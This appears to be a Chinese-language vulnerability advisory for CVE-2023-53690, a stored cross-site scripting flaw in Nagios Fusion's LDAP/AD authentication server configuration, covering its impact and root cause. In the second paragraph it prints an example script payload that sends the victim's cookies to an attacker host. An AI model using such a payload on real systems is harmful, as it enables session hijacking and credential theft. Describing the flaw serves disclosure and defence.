CVE-2023-53690CVE-2023-53690是Nagios Fusion软件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于LDAP/AD身份验证服务器配置功能中,影响4.2.0之前的所有版本。攻击者可以在LDAP/AD集成配置中注入恶意JavaScript代码,这些恶意载荷会被永久存储在系统中。当具有管理员权限的用户访问受影响的配置页面时,注入的恶意脚本会在其浏览器上下文中执行,可能导致会话劫持、敏感信息窃取、权限提升等严重后果。由于攻击者需要具备添加身份验证服务器的高权限,此漏洞的利用门槛相对较高,但一旦被利用,将对整个监控系统造成严重威胁。Nagios Fusion作为企业级网络和系统监控解决方案,被广泛应用于各种组织和企业的IT基础设施中,因此该漏洞的潜在影响范围较大。
该漏洞的根本原因在于Nagios Fusion的LDAP/AD身份验证服务器配置模块对用户输入缺乏充分的输入验证和输出编码。当管理员通过LDAP/AD集成功能添加或修改身份验证服务器时,系统未能对配置参数(如服务器地址、端口号、同步设置等)进行严格的XSS过滤。攻击者可以利用这一缺陷,在配置参数中嵌入恶意JavaScript代码,如:<script>document.location='https://attacker.com/steal?c='+document.cookie</script>。由于这些数据被存储在数据库中且在后续页面访问时被重新渲染,所有访问该配置页面的用户都会执行攻击者注入的恶意代码。攻击者可能窃取管理员会话令牌、执行未授权操作或进一步横向移动。技术层面,漏洞涉及Web应用程序的输入验证缺陷、存储型XSS攻击向量以及浏览器同源策略绕过。